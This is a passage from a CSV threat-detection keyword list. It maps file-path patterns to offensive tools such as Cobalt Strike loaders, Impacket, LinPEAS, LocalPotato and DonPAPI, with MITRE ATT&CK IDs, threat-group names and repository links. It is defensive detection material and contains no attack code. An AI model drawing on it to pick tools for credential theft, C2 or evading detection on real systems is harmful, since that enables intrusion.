T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/ldap.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/SecureAuthCorp/impacket","1","0","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*/ldap_injection.txt*","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A",,"N/A",,, +"*/ldap_search_bof.py*","offensive_tool_keyword","bofhound","Generate BloodHound compatible JSON from logs written by ldapsearch BOF - pyldapsearch and Brute Ratel's LDAP Sentinel","T1046 - T1087 - T1003","TA0007 - TA0009 - TA0001","N/A","N/A","Discovery","https://github.com/fortalice/bofhound","1","1","N/A","5","3","252","25","2023-09-21T23:23:07Z","2022-05-10T17:41:53Z" +"*/ldap-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ldap-checker.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ldap-novell-getpass.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/LdapRelayScan.git*","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1595 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","1","N/A","8","4","390","51","2023-09-04T05:43:00Z","2022-01-16T06:50:44Z" +"*/ldap-rootdse.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ldap-search.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ldapsearch-ad.git*","offensive_tool_keyword","ldapsearch-ad","Python3 script to quickly get various information from a domain controller through his LDAP service.","T1018 - T1087 - T1069","TA0007 - TA0002 - TA0008","N/A","N/A","Reconnaissance","https://github.com/yaap7/ldapsearch-ad","1","1","N/A","N/A","2","123","26","2023-05-10T13:30:16Z","2019-12-08T00:25:57Z" +"*/LDAPWordlistHarvester.git*","offensive_tool_keyword","LDAPWordlistHarvester","A tool to generate a wordlist from the information present in LDAP in order to crack passwords of domain accounts.","T1210.001 - T1087.003 - T1110","TA0001 - TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/p0dalirius/LDAPWordlistHarvester","1","1","N/A","5","3","221","14","2023-10-04T19:01:55Z","2023-09-22T10:10:10Z" +"*/ldeep/*","offensive_tool_keyword","ldeep","In-depth ldap enumeration utility","T1589 T1590 T1591","N/A","N/A","N/A","Reconnaissance","https://github.com/franc-pentest/ldeep","1","1","N/A","N/A","3","219","26","2023-10-02T20:36:02Z","2018-10-22T18:21:44Z" +"*/ldeepDump*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/LetMeOutSharp/*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","1","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" +"*/lexmark-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/lgandx/Responder*","offensive_tool_keyword","icebreaker","Gets plaintext Active Directory credentials if you're on the internal network but outside the AD environment","T1110.001 - T1110.003 - T1059.003","TA0006 - TA0001 - TA0002","N/A","N/A","Credential Access","https://github.com/DanMcInerney/icebreaker","1","0","N/A","10","10","1175","168","2018-10-24T18:14:53Z","2017-12-04T03:42:28Z" +"*/lib/GHunt/*","offensive_tool_keyword","SocialPwned","SocialPwned is an OSINT tool that allows to get the emails. from a target. published in social networks like Instagram. Linkedin and Twitter to find the possible credential leaks in PwnDB or Dehashed and obtain Google account information via GHunt.","T1596","TA0002","N/A","N/A","OSINT exploitation tools","https://github.com/MrTuxx/SocialPwned","1","1","N/A","N/A","9","800","93","2023-08-12T21:59:23Z","2020-04-07T22:25:38Z" +"*/lib/ipLookupHelper.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike C2 Reverse proxy that fends off Blue Teams. AVs. EDRs. scanners through packet inspection and malleable profile correlation","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/mgeeky/RedWarden","1","1","N/A","10","10","821","139","2022-10-07T14:05:25Z","2021-05-15T22:05:39Z" +"*/lib/msf/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/libgobuster*","offensive_tool_keyword","gobuster","Directory/File DNS and VHost busting tool written in Go","T1595 - T1133 - T1110 - T1027 - T1132 - T1048","TA0010 - TA0001 - TA0006 - TA0005 - TA0011","N/A","N/A","Network Exploitation Tools","https://github.com/OJ/gobuster","1","1","N/A","N/A","10","8203","1120","2023-09-12T22:37:40Z","2014-11-14T13:18:35Z" +"*/liboffsetfinder64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/LibSnaffle*","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","N/A","AD Enumeration","https://github.com/Group3r/Group3r","1","1","N/A","N/A","5","488","47","2023-08-07T16:45:14Z","2021-07-05T05:05:42Z" +"*/LightsOut.git*","offensive_tool_keyword","LightsOut","Generate an obfuscated DLL that will disable AMSI & ETW","T1027.003 - T1059.001 - T1082","TA0005 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/icyguider/LightsOut","1","1","N/A","N/A","3","243","29","2023-06-09T10:39:36Z","2023-06-01T14:57:44Z" +"*/ligolo.git*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*/ligolo-ng*","offensive_tool_keyword","ligolo","ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve)","T1071 - T1021 - T1573","TA0011 - TA0002","N/A","N/A","C2","https://github.com/sysdream/ligolo","1","1","N/A","10","10","1438","209","2023-01-06T19:49:22Z","2020-05-22T07:58:13Z" +"*/LinEnum.git*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/LinEnum/*","offensive_tool_keyword","LinEnum","Scripted Local Linux Enumeration & Privilege Escalation Checks","T1046 - T1087.001 - T1057 - T1082 - T1016 - T1135 - T1049 - T1059.004 - T1007 - T1069.001 - T1083 - T1018","TA0007 - TA0009 - TA0002 - TA0003 - TA0001","N/A","N/A","Privilege Escalation","https://github.com/rebootuser/LinEnum","1","1","N/A","N/A","10","6219","1947","2023-09-06T18:02:29Z","2013-08-20T06:26:58Z" +"*/linpeas.sh*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*/linpeas.sh*","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","1","N/A","N/A","10","13378","2821","2023-10-04T17:36:13Z","2019-01-13T19:58:24Z" +"*/linux_ldso_dynamic.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/linux_ldso_hwcap.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/linux_ldso_hwcap_64.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/linux_offset2lib.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/linux-smart-enumeration.git*","offensive_tool_keyword","linux-smart-enumeration","Linux enumeration tool for privilege escalation and discovery","T1087.004 - T1016 - T1548.001 - T1046","TA0007 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/diego-treitos/linux-smart-enumeration","1","1","N/A","9","10","2925","535","2023-09-17T10:27:49Z","2019-02-13T11:02:21Z" +"*/linWinPwn*","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","N/A","10","1393","211","2023-10-03T13:10:13Z","2021-12-16T22:13:10Z" +"*/llmnr-resolve.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/lltd-discovery.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/load-assembly.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/LoadDllRemote.cs*","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","10","10","286","66","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z" +"*/loader/bypass.c","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/bypass.h","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","1","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*/loader/x64/Release/loader.exe*","offensive_tool_keyword","cobaltstrike","A protective and Low Level Shellcode Loader that defeats modern EDR systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/cribdragg3r/Alaris","1","1","N/A","10","10","846","136","2021-11-01T05:00:43Z","2020-02-22T15:42:37Z" +"*/loadercrypt_*.php*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/BC-SECURITY/Malleable-C2-Profiles","1","1","N/A","10","10","224","42","2023-06-11T17:38:36Z","2020-08-28T22:37:09Z" +"*/local-exploits/master/CVE*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/LocalPotato.git*","offensive_tool_keyword","localpotato","The LocalPotato attack is a type of NTLM reflection attack that targets local authentication. This attack allows for arbitrary file read/write and elevation of privilege.","T1550.002 - T1078.003 - T1005 - T1070.004","TA0004 - TA0006 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/decoder-it/LocalPotato","1","1","N/A","10","5","463","69","2023-02-12T18:39:49Z","2023-01-04T18:22:29Z" +"*/LocalPrivEsc/*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z" +"*/localroot/2.6.x/elflbl*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/localroot/2.6.x/h00lyshit*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","1","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" +"*/Locksmith.git*","offensive_tool_keyword","Locksmith","A tiny tool to identify and remediate common misconfigurations in Active Directory Certificate Services","T1552.006 - T1222 - T1046","TA0007 - TA0040 - TA0043","N/A","N/A","Discovery","https://github.com/TrimarcJake/Locksmith","1","1","N/A","8","5","473","38","2023-10-02T02:29:08Z","2022-04-28T01:37:32Z" +"*/log4shell.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/login_scanner*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","0","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/login-securite/DonPAPI*","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","1","N/A","N/A","8","732","95","2023-10-03T05:27:06Z","2021-09-27T09:12:51Z" +"*/logs/*/becon_*.log","offensive_tool_keyword","cobaltstrike","Cobaltstrike toolkit","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/1135/1135-CobaltStrike-ToolKit","1","1","N/A","10","10","149","40","2021-03-29T07:00:00Z","2019-02-22T09:36:44Z" +"*/logs/beacon_log*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/lookupsid.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation 